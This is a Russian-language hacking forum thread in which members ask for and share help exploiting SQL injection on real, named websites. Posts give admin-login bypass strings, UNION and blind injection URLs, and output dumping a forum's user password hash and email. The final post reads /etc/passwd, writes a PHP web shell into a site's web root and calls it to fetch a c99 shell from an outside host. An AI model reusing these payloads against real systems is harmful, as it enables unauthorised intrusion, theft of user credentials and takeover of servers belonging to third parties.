Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Скажите вот есть сайт:
    При вводе кавычек нет ошибки (пробовал '; -- и ' vav va).
    Таких сайтов много видел как с ними работать? Как можно раскрутить скулю на таком сайте?
     
  2. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    а она там есть?
     
  3. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    Я с тебя херею.... Ты думаешь что скуля на всех сайтах?
     
  4. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    CyberHunter, перестань задавть эти вопросы и прочитай хотя бы одну статью по SQL-инъекциях.
     
    1 person likes this.
  5. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    там нету, но есть например здесь
    Code:
    http://oxta.ru/news.php?y=2009&m=12+and+5=5
    
    и кстати не стоит замарачиваться, тут тот тоже скуля есть:
    http://oxta.ru/admin
    login: 'or+5=5/*
    password: asdfg
    удачи ;)
     
    #11865 warlok, 16 Mar 2010
    Last edited: 16 Mar 2010
    5 people like this.
  6. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    select * from users where login='admin' or 1='1' and passwd='202cb962ac59075b964b07152d234b70'

    Можно в админку попасть тут?
     
  7. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    поидее да, если пароль верный, и админ первый в таблице. А закомментить строку так можно?
    Code:
    select * from users where login='admin' or 1=1+--+'
    
    если да, то зайдёшь под логином первого из результата select * from users (обычно админ)
     
    2 people like this.
  8. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163

    select * from users where login='admin' or 1=1/*' and passwd='202cb962ac59075b964b07152d234b70'

    Точно не уверен,попробуй
     
    1 person likes this.
  9. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    Да, комменты я пробовал - не получалось. Неправильно делал.

    Я забыл про закрывающую кавычку и камент, сделал так

    select * from users where login='admin' or 1='1' -- and passwd='202cb962ac59075b964b07152d234b70'


    пустило.
     
    1 person likes this.
  10. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    # еще можна использовать, если используеться гет, то перевести в 16-ную...
     
    #11870 Strilo4ka, 16 Mar 2010
    Last edited: 17 Mar 2010
  11. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    на одном сайте есть уязвимость но все метады уже проверил не какой не идет.. проходит тока этот +AND+ascii(substring(version(),1,1))>117/* а так не идет +AND+ascii(substring((select+table_name+from+information_schema.tables),1,1))>117/* как дальше продолжеть?
    так тоже пробовал or(select+count(*)from(information_schema.columns)/**/group/**/by/**/concat(table_name,floor(rand(0)*2))/**/limit/**/1,1)/* ...
     
  12. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    может схемы просто нет (ветка ниже) или код символа ниже возьми...
    скрипт (нижний пост) заюзай хоть и на пхп или другой инструмент возьми, если слепая.
     
    #11872 Strilo4ka, 17 Mar 2010
    Last edited: 17 Mar 2010
  13. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    там внизу под ошибкой sql стоит
    [XT SQL Error]
    что это??
    и ище очень часто я встречяюсь с этим
    You have an error in your SQL syntax;...................

    [TEP STOP]

    и разкрутить вроде неразу не удалось.. что это может быть?
     
  14. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    объясни что знaчит проходит и нe проходит, т.к. пeрвый зaпрос должeн дaть пустой рeзультaт
     
  15. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    Ну смотрим кто что скажет...
    выпригует алерт с ошибкой выполнения запроса (логирования)...
    самое интересное что это компания которая проводит аудит безопасности :)

    И вот тоже :) как блинд крутить можно ...
    О компании
    с юнион мну не получилось...
     
    #11875 Strilo4ka, 17 Mar 2010
    Last edited: 17 Mar 2010
    1 person likes this.
  16. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292

    MySQL версия 5.0.67
    Data Бaзы:information_schema
    b10160_forum
    b10160_fresh
    b10160_linsm
    Current User: [email protected]


    Code:
    http://www.lins-m.ru/index.php?ID=-1+union+select+1,%28SELECT+concat%280x7e,0x27,phpbb_users.user_password,0x27,0x7e,phpbb_users.username,0x27,0x7e,phpbb_users.user_email,0x27,0x7e,phpbb_users.user_id,0x27,0x7e%29+FROM+b10160_forum.phpbb_users+LIMIT+2,1%29%20,3,4,5--
    ~'880cbc1ed48043cbcdaa7286e058ef7f'~Евгений'[email protected]'~3'~
     
    2 people like this.
  17. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    молодец ступил просто
    когда посылал
    то контент выводился,
    а когда
    нет , и решил шо 4 поля, +++ :)
    Сайт походу умер, за ним не следять так как Copyright © 2008, LINS-M... Просто целесообразно текущий год ставить, имхо...
     
  18. G1G

    G1G Banned

    Joined:
    4 Jun 2009
    Messages:
    24
    Likes Received:
    7
    Reputations:
    0
    Дальше сам ;)
    PHP:
    http://www.enlighteneddating.com/softbizDatingScript/products.php?cid=49+and+1=0+union+select+1,version(),3,4,5--
     
  19. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    PHP:
    http://www.enlighteneddating.com/softbizDatingScript/search_results.php?browse=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,concat_ws(0x3a,version(),database(),user()),30,31,32,33,34,35,36,37,38,39/*
    ...
     
  20. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    вот есть саyт..

    версия 4.1.18..есть mysql.user и file_priv Y..

    хочу заливать шелл..

    читаю /etc/passwd
    http://www.georgica.net/analitic/?page=ru&id=-303'+union+select+1,2,load_file('/etc/passwd'),4,5,6,7,8+from+mysql.user+--+


    а потом '/'
    http://www.georgica.net/analitic/?page=ru&id=-303%27+union+select+1,2,load_file(%27/%27),4,5,6,7,8+from+mysql.user+--+

    а здесь видно папка

    http://www.georgica.net/analitic/?page=ru&id=-303%27+union+select+1,2,load_file(%27/home/www/htdocs/%27),4,5,6,7,8+from+mysql.user+--+

    и потом здеlaю так..

    http://www.georgica.net/analitic/?page=ru&id=-303%27+union+select+%3C?include($_GET[%22cmd%22]);?%3E,1,2,3,4,5,6,7+from+mysql.user/**/into/**/outfile/**/%27/home/www/htdocs/rfi.php%27/*

    http://www.georgica.net/rfi.php?cmd=http://azattacker.org/forum/c99.txt?

    и не получается

    обшем поjaлуста помоqите заливат шелл
     
Thread Status:
Not open for further replies.